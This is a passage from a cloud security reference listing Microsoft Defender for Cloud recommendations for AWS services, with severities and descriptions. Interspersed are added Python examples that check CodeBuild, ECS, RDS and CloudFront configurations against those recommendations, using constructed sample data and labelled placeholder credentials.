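GIT_HOSTED_TYPES = {"GITHUB", "GITHUB_ENTERPRISE", "BITBUCKET"}

PROJECT = {
    "name": "payments-build",
    "source": {
        "type": "GITHUB",
        # Constructed: a personal access token placed before '@' in the clone URL.
        "location": "https://ghp_exampletoken123@github.com/example-org/payments.git",
    },
    "environment": {
        "environmentVariables": [
            # Key IDs are AWS's documented placeholders, not live credentials.
            {"name": "AWS_ACCESS_KEY_ID", "value": "AKIAIOSFODNN7EXAMPLE", "type": "PLAINTEXT"},
            {"name": "AWS_SECRET_ACCESS_KEY", "value": "/build/payments/secret", "type": "SECRETS_MANAGER"},
            {"name": "DEPLOY_KEY", "value": "AKIAI44QH8DHBEXAMPLE", "type": "PLAINTEXT"},
            {"name": "STAGE", "value": "prod", "type": "PLAINTEXT"},
        ]
    },
}


def plaintext_credential_vars(project):
    """Names of PLAINTEXT variables holding AWS credentials.

    PARAMETER_STORE and SECRETS_MANAGER variables hold a reference, not the secret,
    so they pass even when named AWS_SECRET_ACCESS_KEY.
    """
    hits = []
    for var in project.get("environment", {}).get("environmentVariables", []):
        if var.get("type", "PLAINTEXT") != "PLAINTEXT":
            continue
        if var["name"] in CREDENTIAL_VARS or ACCESS_KEY_ID_RE.search(var.get("value", "")):
            hits.append(var["name"])
    return hits


def source_url_has_credentials(project):
    """True if a GitHub/Bitbucket clone URL carries a user name, password or bare token."""
    src = project.get("source", {})
    if src.get("type") not in GIT_HOSTED_TYPES:
        return False
    parts = urlsplit(src.get("location", ""))
    # urlsplit exposes 'token@host' as username with no password; both forms fail.
    return bool(parts.username or parts.password)


def redact(url):
    """Strip userinfo so the finding can be logged without re-leaking the secret."""
    p = urlsplit(url)
    return f"{p.scheme}://***@{p.hostname or ''}{p.path}"


def findings(project):
    """(severity, recommendation, details) tuples using the severities from the table."""
    out = []
    leaked = plaintext_credential_vars(project)
    if leaked:
        out.append(("High", "CodeBuild project environment variables should not contain credentials", leaked))
    if source_url_has_credentials(project):
        out.append(("High", "CodeBuild GitHub or Bitbucket source repository URLs should use OAuth",
                    [redact(project["source"]["location"])]))
    return out


if __name__ == "__main__":
    for severity, recommendation, details in findings(PROJECT):
        print(f"[{severity}] {recommendation}: {', '.join(details)}")
```

Two points are worth keeping when you adapt this: the variable type, not the name, decides whether a value is a secret or a reference to one, and `urlsplit` is a safer way to detect userinfo than a regex on `@`, which also matches `git@github.com:` SSH locations that carry no credential.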


Recommendation: EC2 instances should be managed by AWS Systems Manager (Severity: Medium)
Status of the Amazon EC2 Systems Manager patch compliance is 'COMPLIANT' or 'NON_COMPLIANT' after the patch installation on the instance. Only instances that are managed by AWS Systems Manager Patch Manager are checked. Patches that were applied within the 30-day limit prescribed by PCI DSS requirement '6' are not checked.

Recommendation: Instances managed by Systems Manager should have an association compliance status of COMPLIANT (Severity: Low)
This control checks whether the status of the AWS Systems Manager association compliance is COMPLIANT or NON_COMPLIANT after the association is run on an instance. The control passes if the association compliance status is COMPLIANT.
A State Manager association is a configuration that is assigned to your managed instances. The configuration defines the state that you want to maintain on your instances. For example, an association can specify that antivirus software must be installed and running on your instances, or that certain ports must be closed.
After you create one or more State Manager associations, compliance status information is immediately available to you in the console or in response to AWS CLI commands or corresponding Systems Manager API operations. For associations, "Configuration" Compliance shows statuses of Compliant or Non-compliant and the severity level assigned to the association, such as "Critical" or "Medium". To learn more about State Manager association compliance, see About State Manager association compliance in the AWS Systems Manager User Guide.
You must configure your in-scope EC2 instances for Systems Manager association. You must also configure the patch baseline for the security rating of the vendor of patches, and set the autoapproval date to meet PCI DSS '3.2.1' requirement '6.2'. For additional guidance on how to create an association, see Create an association in the AWS Systems Manager User Guide. For additional information on working with patching in Systems Manager, see AWS Systems Manager Patch Manager in the AWS Systems Manager User Guide.

Recommendation: Lambda functions should have a dead-letter queue configured
Severity: Medium
Description: This control checks whether a Lambda function is configured with a dead-letter queue. The control fails if the Lambda function is not configured with a dead-letter queue.

As an alternative to an on-failure destination, you can configure your function with a dead-letter queue to save discarded events for further processing.

A dead-letter queue acts the same as an on-failure destination. It is used when an event fails all processing attempts or expires without being processed.

A dead-letter queue allows you to look back at errors or failed requests to your Lambda function to debug or identify unusual behavior.

From a security perspective, it is important to understand why your function failed and to ensure that your function does not drop data or compromise data security as a result.

For example, if your function cannot communicate with an underlying resource, that could be a symptom of a denial of service (DoS) attack elsewhere in the network.

Recommendation: Lambda functions should use supported runtimes
Severity: Medium
Description: This control checks that the Lambda function settings for runtimes match the expected values set for the supported runtimes for each language. This control checks for the following runtimes:

nodejs14.x, nodejs12.x, nodejs10.x, python3.8, python3.7, python3.6, ruby2.7, ruby2.5, java11, java8, java8.al2, go1.x, dotnetcore3.1, dotnetcore2.1

Lambda runtimes are built around a combination of operating system, programming language, and software libraries that are subject to maintenance and security updates. When a runtime component is no longer supported for security updates, Lambda deprecates the runtime. Even though you cannot create functions that use the deprecated runtime, the function is still available to process invocation events. Make sure that your Lambda functions are current and do not use out-of-date runtime environments.

To learn more about the supported runtimes that this control checks for the supported languages, see AWS Lambda runtimes in the AWS Lambda Developer Guide.

Recommendation: Management ports of EC2 instances should be protected with just-in-time network access control
Severity: High
Description: Microsoft Defender for Cloud has identified some overly permissive inbound rules for management ports in your network. Enable just-in-time access control to protect your instances from internet-based brute-force attacks. Learn more.


Recommendation: Unused EC2 security groups should be removed
Severity: Low
Description: Security groups should be attached to Amazon EC2 instances or to an ENI. Healthy finding can indicate there are unused Amazon EC2 security groups.


AWS Container recommendations


There are 3 AWS recommendations in this category.


Recommendation: EKS clusters should grant the required AWS permissions to Microsoft Defender for Cloud
Severity: High
Description: Microsoft Defender for Containers provides protections for your EKS clusters.

To monitor your cluster for security vulnerabilities and threats, Defender for Containers needs permissions for your AWS account. These permissions will be used to enable Kubernetes control plane logging on your cluster and establish a reliable pipeline between your cluster and Defender for Cloud's backend in the cloud.

Learn more about Microsoft Defender for Cloud's security features for containerized environments.

Recommendation: EKS clusters should have Microsoft Defender's extension for Azure Arc installed
Severity: High
Description: Microsoft Defender's cluster extension provides security capabilities for your EKS clusters. The extension collects data from a cluster and its nodes to identify security vulnerabilities and threats.

The extension works with Azure Arc-enabled Kubernetes. Learn more about Microsoft Defender for Cloud's security features for containerized environments.

Recommendation: Microsoft Defender for Containers should be enabled on AWS connectors
Severity: High
Description: Microsoft Defender for Containers provides real-time threat protection for containerized environments and generates alerts about suspicious activities.

Use this information to harden the security of Kubernetes clusters and remediate security issues.

Important: When you've enabled Microsoft Defender for Containers and deployed Azure Arc to your EKS clusters, the protections - and charges - will begin. If you don't deploy Azure Arc on a cluster, Defender for Containers will not protect it and no charges will be incurred for this Microsoft Defender plan for that cluster.


Data plane recommendations 


All the data plane recommendations listed here are supported under AWS after enabling the Azure policy extension.


AWS Data recommendations 


There are 66 AWS recommendations in this category. 


Recommendation: Amazon Aurora clusters should have backtracking enabled
Severity: Medium
Description: This control checks whether Amazon Aurora clusters have backtracking enabled.

Backups help you to recover more quickly from a security incident. They also strengthen the resilience of your systems. Aurora backtracking reduces the time to recover a database to a point in time. It doesn't require a database restore to do so.

For more information about backtracking in Aurora, see Backtracking an Aurora DB cluster in the Amazon Aurora User Guide.

Recommendation: Amazon EBS snapshots shouldn't be publicly restorable
Severity: High
Description: Amazon EBS snapshots shouldn't be publicly restorable by everyone unless explicitly allowed, to avoid accidental exposure of data. Additionally, permission to change Amazon EBS configurations should be restricted to authorized AWS accounts only.

Recommendation: Amazon ECS task definitions should have secure networking modes and user definitions
Severity: High
Description: This control checks whether an active Amazon ECS task definition that has host networking mode also has privileged or user container definitions.

The control fails for task definitions that have host network mode and container definitions where privileged=false or is empty and user=root or is empty.

If a task definition has elevated privileges, it is because the customer has specifically opted in to that configuration.

This control checks for unexpected privilege escalation when a task definition has host networking enabled but the customer hasn't opted in to elevated privileges.
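The ECS task-definition control above is easy to misread, so here is the failing combination spelled out as an evaluator. This is an added example, not Microsoft's or AWS's own check logic; it reads the task-definition JSON shape (networkMode, status, containerDefinitions[].privileged and .user) and the sample definitions are constructed for illustration.

```python
"""Evaluate ECS task definitions for the host-network privilege check.

Added example: field names follow the ECS task-definition JSON shape;
the task definitions at the bottom are constructed, not real workloads.
"""
from typing import Any, Dict, List


def container_opted_out_of_privilege(container: Dict[str, Any]) -> bool:
    """True when privileged is false/absent AND user is root/absent.

    That is exactly the failing combination the control describes. A
    container with privileged=true is treated as a deliberate opt-in and is
    not reported; a container with a non-root user is not reported either.
    """
    privileged = container.get("privileged")   # absent -> behaves as false
    user = container.get("user")               # absent / "" -> runs as root
    not_privileged = privileged in (None, False)
    runs_as_root = user in (None, "", "root")
    return not_privileged and runs_as_root


def evaluate_task_definition(task_def: Dict[str, Any]) -> Dict[str, Any]:
    """Return a verdict for one task definition.

    NOT_APPLICABLE: definition is not ACTIVE or does not use host networking.
    FAIL:           host networking plus at least one container that runs as
                    root without an explicit privileged opt-in.
    PASS:           host networking, but every container either set a
                    non-root user or explicitly opted in to privileged mode.
    """
    family = task_def.get("family", "<unknown>")
    if task_def.get("status", "ACTIVE") != "ACTIVE":
        return {"family": family, "status": "NOT_APPLICABLE", "offending": []}
    if task_def.get("networkMode") != "host":
        return {"family": family, "status": "NOT_APPLICABLE", "offending": []}

    offending: List[str] = [
        c.get("name", "<unnamed>")
        for c in task_def.get("containerDefinitions", [])
        if container_opted_out_of_privilege(c)
    ]
    return {"family": family,
            "status": "FAIL" if offending else "PASS",
            "offending": offending}


# Constructed sample task definitions (not from a real account).
SAMPLE_TASK_DEFINITIONS = [
    {   # host networking, root user, no opt-in -> unexpected escalation path
        "family": "web-host-root", "status": "ACTIVE", "networkMode": "host",
        "containerDefinitions": [{"name": "nginx"}],
    },
    {   # host networking, but explicit privileged opt-in -> PASS
        "family": "agent-privileged", "status": "ACTIVE", "networkMode": "host",
        "containerDefinitions": [{"name": "agent", "privileged": True}],
    },
    {   # host networking with non-root users everywhere -> PASS
        "family": "web-host-app", "status": "ACTIVE", "networkMode": "host",
        "containerDefinitions": [{"name": "app", "user": "1000:1000"},
                                 {"name": "sidecar", "user": "nobody",
                                  "privileged": False}],
    },
    {   # awsvpc networking -> control does not apply
        "family": "api-awsvpc", "status": "ACTIVE", "networkMode": "awsvpc",
        "containerDefinitions": [{"name": "api"}],
    },
]


def evaluate_all(task_defs=SAMPLE_TASK_DEFINITIONS) -> List[Dict[str, Any]]:
    return [evaluate_task_definition(td) for td in task_defs]


if __name__ == "__main__":
    for verdict in evaluate_all():
        print(f"{verdict['family']:<18} {verdict['status']:<15} {verdict['offending']}")
```

Note that the evaluator follows the page literally: only the user value "root" (or none) counts as root. A numeric uid of 0 also runs as root, so a production check would want to treat "0" and "0:0" the same way.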


Recommendation: Amazon Elasticsearch Service domains should encrypt data sent between nodes
Severity: Medium
Description: This control checks whether Amazon ES domains have node-to-node encryption enabled. HTTPS (TLS) can be used to help prevent potential attackers from eavesdropping on or manipulating network traffic using person-in-the-middle or similar attacks. Only encrypted connections over HTTPS (TLS) should be allowed. Enabling node-to-node encryption for Amazon ES domains ensures that intra-cluster communications are encrypted in transit. There can be a performance penalty associated with this configuration. You should be aware of and test the performance trade-off before enabling this option.

Recommendation: Amazon Elasticsearch Service domains should have encryption at rest enabled
Severity: Medium
Description: It's important to enable encryption at rest for Amazon ES domains to protect sensitive data.

Recommendation: Amazon RDS database should be encrypted using customer managed key
Severity: Medium
Description: This check identifies RDS databases that are encrypted with default KMS keys and not with customer managed keys. As a leading practice, use customer managed keys to encrypt the data on your RDS databases and maintain control of your keys and data on sensitive workloads.

Recommendation: Amazon RDS instance should be configured with automatic backup settings
Severity: Medium
Description: This check identifies RDS instances that aren't set with the automatic backup setting. If Automatic Backup is set, RDS creates a storage volume snapshot of your DB instance, backing up the entire DB instance and not just individual databases, which provides for point-in-time recovery. The automatic backup happens during the specified backup window and keeps the backups for a limited period of time as defined in the retention period. It's recommended to set automatic backups for your critical RDS servers; they help in the data restoration process.

Recommendation: Amazon Redshift clusters should have audit logging enabled
Severity: Medium
Description: This control checks whether an Amazon Redshift cluster has audit logging enabled.

Amazon Redshift audit logging provides additional information about connections and user activities in your cluster. This data can be stored and secured in Amazon S3 and can be helpful in security audits and investigations. For more information, see Database audit logging in the Amazon Redshift Cluster Management Guide.


Recommendation: Amazon Redshift clusters should have automatic snapshots enabled
Severity: Medium
Description: This control checks whether Amazon Redshift clusters have automated snapshots enabled. It also checks whether the snapshot retention period is greater than or equal to seven. Backups help you to recover more quickly from a security incident. They strengthen the resilience of your systems. Amazon Redshift takes periodic snapshots by default. This control checks whether automatic snapshots are enabled and retained for at least seven days. For more details on Amazon Redshift automated snapshots, see Automated snapshots in the Amazon Redshift Cluster Management Guide.

Recommendation: Amazon Redshift clusters should prohibit public access
Severity: High
Description: We recommend that Amazon Redshift clusters avoid public accessibility; evaluate the 'publiclyAccessible' field in the cluster configuration item.

Recommendation: Amazon Redshift should have automatic upgrades to major versions enabled
Severity: Medium
Description: This control checks whether automatic major version upgrades are enabled for the Amazon Redshift cluster.

Enabling automatic major version upgrades ensures that the latest major version updates to Amazon Redshift clusters are installed during the maintenance window.

These updates might include security patches and bug fixes. Keeping up to date with patch installation is an important step in securing systems.

Recommendation: Amazon SQS queues should be encrypted at rest
Severity: Medium
Description: This control checks whether Amazon SQS queues are encrypted at rest.

Server-side encryption (SSE) allows you to transmit sensitive data in encrypted queues. To protect the content of messages in queues, SSE uses keys managed in AWS KMS.

For more information, see Encryption at rest in the Amazon Simple Queue Service Developer Guide.

Recommendation: An RDS event notifications subscription should be configured for critical cluster events
Severity: Low
Description: This control checks whether an Amazon RDS event subscription exists that has notifications enabled for the following source type, event category key-value pairs. DBCluster: ["maintenance" and "failure"].

RDS event notifications use Amazon SNS to make you aware of changes in the availability or configuration of your RDS resources. These notifications allow for rapid response.

For more information about RDS event notifications, see Using Amazon RDS event notification in the Amazon RDS User Guide.


Recommendation: An RDS event notifications subscription should be configured for critical database instance events
Severity: Low
Description: This control checks whether an Amazon RDS event subscription exists with notifications enabled for the following source type, event category key-value pairs. DBInstance: ["maintenance", "configuration change" and "failure"].

RDS event notifications use Amazon SNS to make you aware of changes in the availability or configuration of your RDS resources. These notifications allow for rapid response.

For more information about RDS event notifications, see Using Amazon RDS event notification in the Amazon RDS User Guide.

Recommendation: An RDS event notifications subscription should be configured for critical database parameter group events
Severity: Low
Description: This control checks whether an Amazon RDS event subscription exists with notifications enabled for the following source type, event category key-value pairs. DBParameterGroup: ["configuration", "change"].

RDS event notifications use Amazon SNS to make you aware of changes in the availability or configuration of your RDS resources. These notifications allow for rapid response.

For more information about RDS event notifications, see Using Amazon RDS event notification in the Amazon RDS User Guide.

Recommendation: An RDS event notifications subscription should be configured for critical database security group events
Severity: Low
Description: This control checks whether an Amazon RDS event subscription exists with notifications enabled for the following source type, event category key-value pairs. DBSecurityGroup: ["configuration", "change", "failure"].

RDS event notifications use Amazon SNS to make you aware of changes in the availability or configuration of your RDS resources. These notifications allow for a rapid response.

For more information about RDS event notifications, see Using Amazon RDS event notification in the Amazon RDS User Guide.

Recommendation: API Gateway REST and WebSocket API logging should be enabled
Severity: Medium
Description: This control checks whether all stages of an Amazon API Gateway REST or WebSocket API have logging enabled.

The control fails if logging isn't enabled for all methods of a stage or if logging Level is neither ERROR nor INFO.

API Gateway REST or WebSocket API stages should have relevant logs enabled. API Gateway REST and WebSocket API execution logging provides detailed records of requests made to API Gateway REST and WebSocket API stages.

The stages include API integration backend responses, Lambda authorizer responses, and the requestId for AWS integration endpoints.
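The four RDS event-subscription controls (cluster, database instance, parameter group and security group events) share one evaluation pattern, so here is a single checker that covers all of them. This is an added example rather than Microsoft's or AWS's own logic. It assumes the RDS DescribeEventSubscriptions response shape (SourceType, EventCategoriesList, Enabled, Status, CustSubscriptionId) and maps the page's DBCluster/DBInstance/DBParameterGroup/DBSecurityGroup labels onto the API source-type strings; the category spelled "configuration change" is the API name for the page's configuration-change category. The subscriptions at the bottom are constructed.

```python
"""Check RDS event subscriptions against the four required coverages.

Added example. Key names follow the RDS DescribeEventSubscriptions API;
the mapping of the page's DBCluster/DBInstance/... labels to the API
source-type strings is an assumption, and the sample data is constructed.
"""
from typing import Any, Dict, List, Optional, Set

# Required (source type -> event categories) pairs from the four controls.
REQUIRED_COVERAGE: Dict[str, Set[str]] = {
    "db-cluster": {"maintenance", "failure"},
    "db-instance": {"maintenance", "configuration change", "failure"},
    "db-parameter-group": {"configuration change"},
    "db-security-group": {"configuration change", "failure"},
}


def categories_covered(sub: Dict[str, Any], source_type: str,
                       required: Set[str]) -> Set[str]:
    """Subset of `required` that this subscription delivers for `source_type`.

    RDS semantics assumed here: the subscription must be Enabled and active;
    a missing SourceType means "all source types"; an empty
    EventCategoriesList means "all categories" for that source type.
    """
    if not sub.get("Enabled", False) or sub.get("Status", "active") != "active":
        return set()
    sub_type = sub.get("SourceType")
    if sub_type not in (None, "", source_type):
        return set()
    categories = {c.lower() for c in (sub.get("EventCategoriesList") or [])}
    if not categories:
        return set(required)
    return categories & required


def evaluate_event_subscriptions(subs: List[Dict[str, Any]]) -> Dict[str, Dict[str, Any]]:
    """One verdict per source type.

    The controls ask whether *a* subscription exists that covers the
    required categories, so a single subscription must cover all of them;
    coverage is deliberately not unioned across subscriptions. `missing`
    reports the gap of the best candidate so an operator sees what to add.
    """
    verdicts: Dict[str, Dict[str, Any]] = {}
    for source_type, required in REQUIRED_COVERAGE.items():
        best: Set[str] = set()
        best_id: Optional[str] = None
        for sub in subs:
            covered = categories_covered(sub, source_type, required)
            if len(covered) > len(best):
                best, best_id = covered, sub.get("CustSubscriptionId")
        verdicts[source_type] = {
            "status": "PASS" if best >= required else "FAIL",
            "best_subscription": best_id,
            "missing": sorted(required - best),
        }
    return verdicts


# Constructed sample subscriptions (not from a real account).
SAMPLE_SUBSCRIPTIONS = [
    {"CustSubscriptionId": "cluster-alerts", "SourceType": "db-cluster",
     "EventCategoriesList": ["maintenance", "failure"],
     "Enabled": True, "Status": "active"},
    {"CustSubscriptionId": "instance-failures", "SourceType": "db-instance",
     "EventCategoriesList": ["failure"], "Enabled": True, "Status": "active"},
    {"CustSubscriptionId": "pg-all-disabled", "SourceType": "db-parameter-group",
     "EventCategoriesList": [], "Enabled": False, "Status": "active"},
]


if __name__ == "__main__":
    for source_type, verdict in evaluate_event_subscriptions(SAMPLE_SUBSCRIPTIONS).items():
        print(f"{source_type:<20} {verdict['status']:<5} "
              f"via={verdict['best_subscription']} missing={verdict['missing']}")
```

With the constructed data only the cluster subscription passes: the instance subscription lacks the maintenance and configuration-change categories, the parameter-group subscription is disabled, and nothing covers security groups at all. A single enabled subscription with no SourceType and no categories (an "everything" subscription) satisfies all four.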


Recommendation: API Gateway REST API cache data should be encrypted at rest
Severity: Medium
Description: This control checks whether all methods in API Gateway REST API stages that have cache enabled are encrypted. The control fails if any method in an API Gateway REST API stage is configured to cache and the cache isn't encrypted.

Encrypting data at rest reduces the risk of data stored on disk being accessed by a user not authenticated to AWS. It adds another set of access controls to limit unauthorized users' ability to access the data. For example, API permissions are required to decrypt the data before it can be read.

API Gateway REST API caches should be encrypted at rest for an added layer of security.

Recommendation: API Gateway REST API stages should be configured to use SSL certificates for backend authentication
Severity: Medium
Description: This control checks whether Amazon API Gateway REST API stages have SSL certificates configured.

Backend systems use these certificates to authenticate that incoming requests are from API Gateway.

API Gateway REST API stages should be configured with SSL certificates to allow backend systems to authenticate that requests originate from API Gateway.

Recommendation: API Gateway REST API stages should have AWS X-Ray tracing enabled
Severity: Low
Description: This control checks whether AWS X-Ray active tracing is enabled for your Amazon API Gateway REST API stages.

X-Ray active tracing enables a more rapid response to performance changes in the underlying infrastructure. Changes in performance could result in a lack of availability of the API.

X-Ray active tracing provides real-time metrics of user requests that flow through your API Gateway REST API operations and connected services.

Recommendation: API Gateway should be associated with an AWS WAF web ACL
Severity: Medium
Description: This control checks whether an API Gateway stage uses an AWS WAF web access control list (ACL).

This control fails if an AWS WAF web ACL isn't attached to a REST API Gateway stage.

AWS WAF is a web application firewall that helps protect web applications and APIs from attacks. It enables you to configure an ACL, which is a set of rules that allow, block, or count web requests based on customizable web security rules and conditions that you define.

Ensure that your API Gateway stage is associated with an AWS WAF web ACL to help protect it from malicious attacks.


Recommendation: Application and Classic Load Balancers logging should be enabled
Severity: Medium
Description: This control checks whether the Application Load Balancer and the Classic Load Balancer have logging enabled. The control fails if access_logs.s3.enabled is false.

Elastic Load Balancing provides access logs that capture detailed information about requests sent to your load balancer. Each log contains information such as the time the request was received, the client's IP address, latencies, request paths, and server responses. You can use these access logs to analyze traffic patterns and to troubleshoot issues.

To learn more, see Access logs for your Classic Load Balancer in the User Guide for Classic Load Balancers.

Recommendation: Attached EBS volumes should be encrypted at-rest
Severity: Medium
Description: This control checks whether the EBS volumes that are in an attached state are encrypted. To pass this check, EBS volumes must be in use and encrypted. If the EBS volume isn't attached, then it isn't subject to this check.

For an added layer of security of your sensitive data in EBS volumes, you should enable EBS encryption at rest. Amazon EBS encryption offers a straightforward encryption solution for your EBS resources that doesn't require you to build, maintain, and secure your own key management infrastructure. It uses AWS KMS customer master keys (CMK) when creating encrypted volumes and snapshots.

To learn more about Amazon EBS encryption, see Amazon EBS encryption in the Amazon EC2 User Guide for Linux Instances.

Recommendation: AWS Database Migration Service replication instances shouldn't be public
Severity: High
Description: To protect your replicated instances from threats, a private replication instance should have a private IP address that you can't access outside of the replication network.

A replication instance should have a private IP address when the source and target databases are in the same network, and the network is connected to the replication instance's VPC using a VPN, AWS Direct Connect, or VPC peering.

You should also ensure that access to your AWS DMS instance configuration is limited to only authorized users. To do this, restrict users' IAM permissions to modify AWS DMS settings and resources.


Recommendation: Classic Load Balancer listeners should be configured with HTTPS or TLS termination
Severity: Medium
Description: This control checks whether your Classic Load Balancer listeners are configured with HTTPS or TLS protocol for front-end (client to load balancer) connections. The control is applicable if a Classic Load Balancer has listeners. If your Classic Load Balancer doesn't have a listener configured, then the control doesn't report any findings.

The control passes if the Classic Load Balancer listeners are configured with TLS or HTTPS for front-end connections.

The control fails if the listener isn't configured with TLS or HTTPS for front-end connections.

Before you start to use a load balancer, you must add one or more listeners. A listener is a process that uses the configured protocol and port to check for connection requests. Listeners can support both HTTP and HTTPS/TLS protocols. You should always use an HTTPS or TLS listener, so that the load balancer does the work of encryption and decryption in transit.

Recommendation: Classic Load Balancers should have connection draining enabled
Severity: Medium
Description: This control checks whether Classic Load Balancers have connection draining enabled.

Enabling connection draining on Classic Load Balancers ensures that the load balancer stops sending requests to instances that are de-registering or unhealthy. It keeps the existing connections open. This is useful for instances in Auto Scaling groups, to ensure that connections aren't severed abruptly.

Recommendation: CloudFront distributions should have AWS WAF enabled
Severity: Medium
Description: This control checks whether CloudFront distributions are associated with either AWS WAF or AWS WAFv2 web ACLs. The control fails if the distribution isn't associated with a web ACL.

AWS WAF is a web application firewall that helps protect web applications and APIs from attacks. It allows you to configure a set of rules, called a web access control list (web ACL), that allow, block, or count web requests based on customizable web security rules and conditions that you define. Ensure your CloudFront distribution is associated with an AWS WAF web ACL to help protect it from malicious attacks.


Recommendation: CloudFront distributions should have logging enabled
Severity: Medium
Description: This control checks whether server access logging is enabled on CloudFront distributions. The control fails if access logging isn't enabled for a distribution.

CloudFront access logs provide detailed information about every user request that CloudFront receives. Each log contains information such as the date and time the request was received, the IP address of the viewer that made the request, the source of the request, and the port number of the request from the viewer. These logs are useful for applications such as security and access audits and forensics investigation. For more guidance on how to analyze access logs, see Querying Amazon CloudFront logs in the Amazon Athena User Guide.

Recommendation: CloudFront distributions should require encryption in transit
Severity: Medium
Description: This control checks whether an Amazon CloudFront distribution requires viewers to use HTTPS directly or whether it uses redirection. The control fails if ViewerProtocolPolicy is set to allow-all for defaultCacheBehavior or for cacheBehaviors.

HTTPS (TLS) can be used to help prevent potential attackers from using person-in-the-middle or similar attacks to eavesdrop on or manipulate network traffic. Only encrypted connections over HTTPS (TLS) should be allowed. Encrypting data in transit can affect performance. You should test your application with this feature to understand the performance profile and the impact of TLS.

Recommendation: CloudTrail logs should be encrypted at rest using KMS CMKs
Severity: Medium
Description: We recommend configuring CloudTrail to use SSE-KMS. Configuring CloudTrail to use SSE-KMS provides more confidentiality controls on log data, as a given user must have S3 read permission on the corresponding log bucket and must be granted decrypt permission by the CMK policy.

Recommendation: Connections to Amazon Redshift clusters should be encrypted in transit
Severity: Medium
Description: This control checks whether connections to Amazon Redshift clusters are required to use encryption in transit. The check fails if the Amazon Redshift cluster parameter require_SSL isn't set to '1'.

TLS can be used to help prevent potential attackers from using person-in-the-middle or similar attacks to eavesdrop on or manipulate network traffic. Only encrypted connections over TLS should be allowed. Encrypting data in transit can affect performance. You should test your application with this feature to understand the performance profile and the impact of TLS.
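The three CloudFront controls on this page (WAF association, access logging, and the ViewerProtocolPolicy check for encryption in transit) all read the same distribution configuration, so here is one evaluator for them. This is an added example, not Microsoft's or AWS's own code; it assumes the CloudFront DistributionConfig key names (DefaultCacheBehavior, CacheBehaviors.Items, ViewerProtocolPolicy, WebACLId, Logging.Enabled), and the two distributions at the bottom are constructed, with a placeholder web ACL ARN.

```python
"""Evaluate a CloudFront DistributionConfig against the CloudFront controls.

Added example. Key names follow the CloudFront DistributionConfig shape;
the sample distributions are constructed and the web ACL ARN is a placeholder.
"""
from typing import Any, Dict, List


def allow_all_behaviors(config: Dict[str, Any]) -> List[str]:
    """Names of cache behaviours whose ViewerProtocolPolicy is allow-all.

    A behaviour with no policy set is treated as allow-all. That is my
    conservative assumption, so a missing field cannot silently pass.
    """
    behaviours = [("DefaultCacheBehavior", config.get("DefaultCacheBehavior") or {})]
    items = (config.get("CacheBehaviors") or {}).get("Items") or []
    for i, cb in enumerate(items):
        behaviours.append((f"CacheBehaviors[{i}]({cb.get('PathPattern', '*')})", cb))
    return [name for name, cb in behaviours
            if cb.get("ViewerProtocolPolicy", "allow-all") == "allow-all"]


def evaluate_distribution(config: Dict[str, Any]) -> Dict[str, Any]:
    """Verdicts for encryption in transit, WAF association and access logging."""
    offending = allow_all_behaviors(config)
    logging_enabled = bool((config.get("Logging") or {}).get("Enabled"))
    return {
        "encryption_in_transit": "FAIL" if offending else "PASS",
        "allow_all_behaviors": offending,
        "waf_web_acl": "PASS" if config.get("WebACLId") else "FAIL",
        "access_logging": "PASS" if logging_enabled else "FAIL",
    }


# Constructed: the default behaviour redirects to HTTPS, but a legacy path
# still allows plain HTTP, no web ACL is attached, and logging is on.
WEAK_DISTRIBUTION = {
    "DefaultCacheBehavior": {"ViewerProtocolPolicy": "redirect-to-https"},
    "CacheBehaviors": {"Quantity": 1, "Items": [
        {"PathPattern": "/legacy/*", "ViewerProtocolPolicy": "allow-all"}]},
    "WebACLId": "",
    "Logging": {"Enabled": True, "Bucket": "example-logs.s3.amazonaws.com",
                "Prefix": "cf/"},
}

# Constructed: the same distribution with all three findings remediated.
HARDENED_DISTRIBUTION = {
    "DefaultCacheBehavior": {"ViewerProtocolPolicy": "https-only"},
    "CacheBehaviors": {"Quantity": 1, "Items": [
        {"PathPattern": "/legacy/*", "ViewerProtocolPolicy": "redirect-to-https"}]},
    # placeholder ARN, not a real web ACL
    "WebACLId": "arn:aws:wafv2:us-east-1:123456789012:global/webacl/example/PLACEHOLDER-ID",
    "Logging": {"Enabled": True, "Bucket": "example-logs.s3.amazonaws.com",
                "Prefix": "cf/"},
}


if __name__ == "__main__":
    for label, dist in (("weak", WEAK_DISTRIBUTION), ("hardened", HARDENED_DISTRIBUTION)):
        print(label, evaluate_distribution(dist))
```

The per-behaviour report matters in practice: a distribution whose default behaviour is correct still fails the control if a single path-pattern behaviour allows plain HTTP, which is exactly the case the weak sample shows.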


Recommendation: Connections to Elasticsearch domains should be encrypted using TLS 1.2
Severity: Medium
Description: This control checks whether connections to Elasticsearch domains are required to use TLS 1.2. The check fails if the Elasticsearch domain TLSSecurityPolicy isn't Policy-Min-TLS-1-2-2019-07.

HTTPS (TLS) can be used to help prevent potential attackers from using person-in-the-middle or similar attacks to eavesdrop on or manipulate network traffic. Only encrypted connections over HTTPS (TLS) should be allowed. Encrypting data in transit can affect performance. You should test your application with this feature to understand the performance profile and the impact of TLS. TLS 1.2 provides several security enhancements over previous versions of TLS.

Recommendation: DynamoDB tables should have point-in-time recovery enabled
Severity: Medium
Description: This control checks whether point-in-time recovery (PITR) is enabled for an Amazon DynamoDB table.

Backups help you to recover more quickly from a security incident. They also strengthen the resilience of your systems. DynamoDB point-in-time recovery automates backups for DynamoDB tables. It reduces the time to recover from accidental delete or write operations.

DynamoDB tables that have PITR enabled can be restored to any point in time in the last 35 days.

Recommendation: EBS default encryption should be enabled
Severity: Medium
Description: This control checks whether account-level encryption is enabled by default for Amazon Elastic Block Store (Amazon EBS).

The control fails if the account-level encryption isn't enabled. When encryption is enabled for your account, Amazon EBS volumes and snapshot copies are encrypted at rest. This adds another layer of protection for your data.

For more information, see Encryption by default in the Amazon EC2 User Guide for Linux Instances.

Note that the following instance types don't support encryption: R1, C1, and M1.

Recommendation: Elastic Beanstalk environments should have enhanced health reporting enabled
Severity: Low
Description: This control checks whether enhanced health reporting is enabled for your AWS Elastic Beanstalk environments.

Elastic Beanstalk enhanced health reporting enables a more rapid response to changes in the health of the underlying infrastructure. These changes could result in a lack of availability of the application.

Elastic Beanstalk enhanced health reporting provides a status descriptor to gauge the severity of the identified issues and identify possible causes to investigate. The Elastic Beanstalk health agent, included in supported Amazon Machine Images (AMIs), evaluates logs and metrics of environment EC2 instances.


Recommendation: Elastic Beanstalk managed platform updates should be enabled
Severity: High
Description: This control checks whether managed platform updates are enabled for the Elastic Beanstalk environment.

Enabling managed platform updates ensures that the latest available platform fixes, updates, and features for the environment are installed. Keeping up to date with patch installation is an important step in securing systems.

